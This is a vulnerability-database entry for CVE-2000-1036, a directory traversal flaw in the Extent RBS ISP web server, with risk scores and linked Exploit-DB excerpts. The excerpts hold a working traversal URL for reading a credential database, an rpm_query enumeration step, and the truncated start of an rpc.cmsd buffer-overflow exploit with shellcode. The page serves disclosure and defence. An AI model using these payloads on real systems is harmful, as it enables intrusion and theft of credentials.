CVE-2000-1036
published 2000-12-11CVE-2000-1036: Directory traversal vulnerability in Extent RBS ISP web server allows remote attackers to read sensitive information via a .. (dot dot) attack on the Image…
PriorityP421medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.85%
88.8th percentile
Directory traversal vulnerability in Extent RBS ISP web server allows remote attackers to read sensitive information via a .. (dot dot) attack on the Image parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| extent_technologies | rbs_isp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
extent technologies rbs isp 2.5 - Directory Traversal
exploitdb·2000-09-21
CVE-2000-1036 extent technologies rbs isp 2.5 - Directory Traversal
extent technologies rbs isp 2.5 - Directory Traversal
---
source: https://www.securityfocus.com/bid/1704/info
A remote user is capable of gaining read access to any file residing in the same directory of a host running Extent RBS ISP through directory traversal. Appending '../' to the 'image' variable request on port 8002 will enable a user to read any available file includeing credit card details, username, password etc.
For example:
http://target:8002/Newuser?Image=../../database/rbsserv.mdb
Exploit-DB
Caldera OpenLinux 2.3 - rpm_query CGI
exploitdb·2000-03-05
CVE-2000-0192 Caldera OpenLinux 2.3 - rpm_query CGI
Caldera OpenLinux 2.3 - rpm_query CGI
---
source: https://www.securityfocus.com/bid/1036/info
A vulnerability exists in the default installation of Caldera OpenLinux 2.3. A CGI is installed in /home/httpd/cgi-bin/ names rpm_query. Any user can run this CGI and obtain a listing of the packages, and versions of packages, installed on this system. This could be used to determine vulnerabilities on the machine remotely.
Run the rpm_query CGI via a GET. It is located in /cgi-bin/rmp_query, relative to the root of the web server.
Exploit-DB
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
exploitdb·1999-07-13
CVE-1999-0696 Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/524/info
There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise.
/*
* Unixware 7.x rpc.cmsd exploit by jGgM
* http://www.netemperor.com/en/
* EMail: [email protected]
*/
#include
#include
#include
#include
#include
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21
#define BUFFER_SIZE 1036
#define SHELL_START 1024
#define RET_LENGTH 12
#define ADJUST 100
#define NOP 0x90
#define LEN 68
char shell[] =
/* 0 */ "\xeb\x3d" /* jmp springboard [2000]*/
/* syscall: [200
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2000-09/0252.htmlhttp://www.securityfocus.com/bid/1704https://exchange.xforce.ibmcloud.com/vulnerabilities/5275http://archives.neohapsis.com/archives/bugtraq/2000-09/0252.htmlhttp://www.securityfocus.com/bid/1704https://exchange.xforce.ibmcloud.com/vulnerabilities/5275
2000-12-11
Published